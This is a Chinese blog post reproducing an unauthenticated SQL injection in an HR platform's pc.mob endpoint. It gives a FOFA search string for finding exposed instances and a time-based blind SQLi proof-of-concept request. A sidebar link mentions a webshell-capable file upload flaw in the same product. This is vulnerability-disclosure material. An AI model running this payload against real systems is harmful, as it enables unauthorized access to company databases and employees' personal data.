57qi5rW35LqRZUhS pc.mob SQL注入漏洞复现

已于 2024-08-17 16:12:06 修改
阅读量126 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-17 16:11:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/141282264
版权

0x01 产品简介

57qi5rW35LqRZUhS是大中型企业广泛采用人力资源管理系统。某云是国内顶尖的HR软件供应商,是新一代eHR系统的领导者。

0x02 漏洞概述

57qi5rW35LqRZUhS pc.mob 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:body="/RedseaPlatform/skins/images/favicon.ico"

0x04 漏洞复现

PoC

GET /RedseaPlatform/goApp/pc.mob?id=1{
  {urlescape(' AND (SELECT 4509 FROM (SELECT(SLEEP(5)))eUlE) AND 'nPiP'='nPiP)}} HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

延时5秒

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
57qi5rW35LqRZUhS PtFjk.mob 任意文件上传漏洞复现
0xSec
05-08 1020
57qi5rW35LqRZUhS系统PtFjk.mob接口处存在未授权文件上传漏洞,攻击者可上传webshell来命令执行,获取服务器权限。
[深入研究4G/5G/6G专题-40]: URLLC-11-《3GPP URLLC相关协议、规范、技术原理深度解读》-5-5G Qos原理与架构: 切片、PDU会话、QosFlow、5QI、DRB
热门推荐
文火冰糖(王文兵)的博客
07-23 7万+
前提探讨了5G网络通过网络切片方式区分URLLC业务,根据网络切片为URLLC业务提供特定的性能指标要求,本文探讨无线接入网侧如何区别对待URLLC业务数据流?在无线接入网一侧,在处于eMBB业务的时候,是根据Qos来区分不同的业务优先级和性能指标要求的,在eMBB业务支持向URLLC业务支持的过程中,并没有彻底放弃eMBB基于Qos优先级调度的机制,也没有定义一套全新的基于网络切片的资源预留与隔离机制,而是在eMBB的Qos调度机制的基础之上做了进一步的增强,涉及到的关键概念有服务质量网络延迟。.....
Hbuilder (H5+) plus.webview 预加载
唐僧的专栏
07-17 1万+
Hbuilder (H5+) plus.webview 预加载 plus.webview.create 经常会用到 webview 来显示 Web网页,但是有时候 会出现白屏, 而且有些低端机器 时间还挺长。这个时候就需要用到预加载。 应为 我们要用的 plus.webview 创建完毕, 关闭不同 ...
h5传奇 cqgmb.php,魔兽世界怀旧服狂暴战bwl最新WA字符串集合
weixin_36403106的博客
03-21 8251
魔兽世界怀旧服狂暴战bwl最新WA字符串集合2020-02-26 16:03作者:我游网来源:本站整理浏览:482《魔兽世界怀旧服》狂暴战是一个玩法比较舒服的职业,这里我们整理了狂暴战bwl最新WA字符串集合,让你在黑翼之巢也能够轻松输出打dps!狂暴战WA整合,完善压制、消骨BUFF、乱舞及英勇声效!感谢大佬的原始WA,自己根据自身双手优化了乱舞、压制、消骨及英勇卡秒声效等... !S3x...
Druid SQL解析原理以及使用(一)
qq_25104587的博客
05-26 2万+
本篇文章主要以使用为主,比如通过解析分析一条SQL的组成来完成SQL改写等,现在流行的数据中间件中使用很广泛,Mycat、Dble等。 Druid的SQL解析器主要有三部分组成,如下: 1、Parser a、词法分析 b、语法分析 2、AST(Abstract Syntax Tree,抽象语法树) 3、Visitor 1、什么是AST 在计算机科...
sqli-labs第七关sql注入流程
qq_33598708的博客
04-09 3603
正常访问 http://127.0.0.1/sqli-labs-master/Less-7/?id=1 正常访问以后提示Use outfile..... 什么是outfile:参考地址 MySQL中你可以使用SELECT...INTO OUTFILE语句来简单的导出数据到文本文件上。 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' and '1'='1 通过注入字符没有报错可以判断是字符类型的,这关数据库报错不会提示
老猿学5G:多量纲计费与QoS的QCI、5QI、ARP、GBR和MBR
老猿Python
07-24 2万+
多量纲计费是与传统的计费模式相区别的一种计费模式,传统的计费基本上都是通过使用量、使用时长或包固定时长等方式计费,而多量纲计费是指在考虑以上方式之外,对流量等业务采用按上下行带宽和速率、时延、切片、垂直行业应用、 QCI、ARP、GBR和MBR都是服务级别QoS的参数, SDF:Service Data Flow 一、QCI QCI(QoS class identifier),是系统用于标识业务数据包传输特性的参数,包括分别对应不同的资源类型、不同的优先级、不同的时延和不同的丢包率等 ...
鲁大师html5测试网站,ludashi.com
weixin_39603778的博客
07-05 5万+
Domain Name: ludashi.comRegistry Domain ID: 1561559654_DOMAIN_COM-VRSNRegistrar WHOIS Server: whois.ename.comRegistrar URL: http://www.ename.netUpdated Date: 2015-05-27 T07:47:46ZCreation Date: 2009-0...
Springboot JPA Caused by: java.sql.SQLException: interrupt / Unable to acquire JDBC Connection
隔壁老瓦的专栏
11-16 1万+
2018-11-16 17:58:47 marketingcenter [hystrix-UserRightController-1] INFO  c.t.common.aspect.log.ServiceAspect[43] [TxId :  , SpanId : ]- Service Exception      :      class javax.persistence.Persiste...
一文了解 Text-to-SQL
Datawhale
01-18 4408
作者:哈工大SCIR 窦隆绪,潘名扬,乔振浩简介Text-to-SQL系统能够将自然语言描述转化成对应的SQL查询语句,这项技术能够有效地辅助人们对海量的数据库进行查询。因此,该项研究引...
wu-zi-qi.rar_885qi.com_三手
09-24
《五子棋算法详解与全代码实现》 五子棋,一种源于中国的传统棋类游戏,深受广大玩家喜爱。在编程领域,实现五子棋的算法是一项有趣且富有挑战性的任务,尤其当需要遵循国际规则时,如三禁手规则。...
qi-pc0-part12-v124.pdf
02-25
文件标题"Qi-PC0-Part12-v124.pdf"暗示了这份文件包含了Qi无线充电标准中功率类0的规范,第1部分和第2部分,版本号为1.2.4。 从描述来看,这份文档提供了Qi无线电力传输系统的接口定义,这些定义是基于规范的两个...
qi-pc0-part3-v124.pdf
02-25
根据提供的文件信息,以下是关于“QI无线充电协议第3部分”的知识点详细说明: 1. Qi无线充电技术:Qi是一种国际无线充电标准,通过电磁感应的方式实现电力的无线传输。它由无线电力联盟(Wireless Power ...
Qi充电协议1.2.3中文翻译.docx
04-13
Qi充电协议1.2.3版分为两种功率配置文件:**基线功率分布**(最高5W)和**扩展功率分布**(超过5W)。 1. **基线功率配置文件**:适用于大多数低功率设备,如智能手机等。支持可选的**异物检测(FOD)扩展**功能。 2....
tian_qi_yu_bao.rar_tian.qi.yu.b_天气预报
09-24
《天气预报应用详解——以"tian_qi_yu_bao.rar_tian.qi.yu.b"为例》 在日常生活中,我们常常需要获取实时的天气信息,以便于规划行程或者应对突发的气候变化。"tian_qi_yu_bao.rar_tian.qi.yu.b"就是一款专为旅行和...
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 292
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 428
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 308
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 138
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
使用python连接sql server数据库,服务器是MKQIP5QI,库名是chai
04-20
很高兴回答你的问题。对于使用Python连接SQL Server数据库,您需按照以下步骤进行操作: 1.确保您已安装了Python的pyodbc库,可以使用以下命令进行安装: pip install pyodbc 2.在您的Python代码中导入pyodbc库: import pyodbc 3.连接数据库,需要提供数据库的连接字符串。连接字符串应包括服务器名称、数据库名称、用户名和密码等信息。例如: cnxn = pyodbc.connect('DRIVER={SQL Server Native Client 11.0};SERVER=MKQIP5QI;DATABASE=chai;UID=username;PWD=password') 其中,SERVER为服务器名称,DATABASE为数据库名称,UID为用户名,PWD为密码。 4.执行SQL语句进行数据操作,例如: cursor = cnxn.cursor() cursor.execute('SELECT * FROM table_name') 5.关闭数据库连接: cnxn.close() 希望能对您有所帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值